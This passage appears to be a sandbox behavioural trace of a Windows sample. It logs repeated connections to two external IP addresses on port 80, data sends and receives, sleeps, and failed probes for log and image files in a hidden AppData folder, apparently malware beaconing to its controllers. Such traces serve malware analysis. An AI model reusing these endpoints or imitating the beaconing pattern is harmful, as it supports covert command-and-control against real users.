(s=0x2e4, name=0x70ad7b0*(sa_family=2, sin_port=0x50, sin_addr="35.213.185.140"), namelen=16) returned 0 [0226.597] send (s=0x2e4, buf=0x25a505a*, len=174, flags=0) returned 174 [0226.597] setsockopt (s=0x2e4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0226.597] recv (in: s=0x2e4, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 549 [0226.861] closesocket (s=0x2e4) returned 0 [0226.862] Sleep (dwMilliseconds=0x7d0) [0226.878] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.879] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.879] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0226.879] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.879] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.879] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.879] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.879] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.879] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.879] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.879] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.879] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.879] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.879] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.880] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.880] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.880] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.880] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.880] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.880] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.880] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.880] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.880] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.880] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.880] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.880] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.880] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.880] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.880] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.880] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.880] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.880] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.880] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.880] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.881] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.881] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.881] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.881] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.881] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0226.881] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.881] socket (af=2, type=1, protocol=6) returned 0x2e4 [0226.881] connect (s=0x2e4, name=0x70aca30*(sa_family=2, sin_port=0x50, sin_addr="35.242.251.130"), namelen=16) returned 0 [0226.901] send (s=0x2e4, buf=0x25a505a*, len=173, flags=0) returned 173 [0226.901] setsockopt (s=0x2e4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0226.901] recv (in: s=0x2e4, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 774 [0226.965] closesocket (s=0x2e4) returned 0 [0226.966] Sleep (dwMilliseconds=0x7d0) [0226.968] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.968] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.968] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0226.968] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.968] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.968] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.968] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.968] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.968] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.968] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.968] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.968] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.968] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.968] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.969] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.969] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.969] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.969] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.969] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.969] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.969] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.969] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.969] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.969] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.969] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.969] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.969] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.969] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.969] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.970] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.970] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: 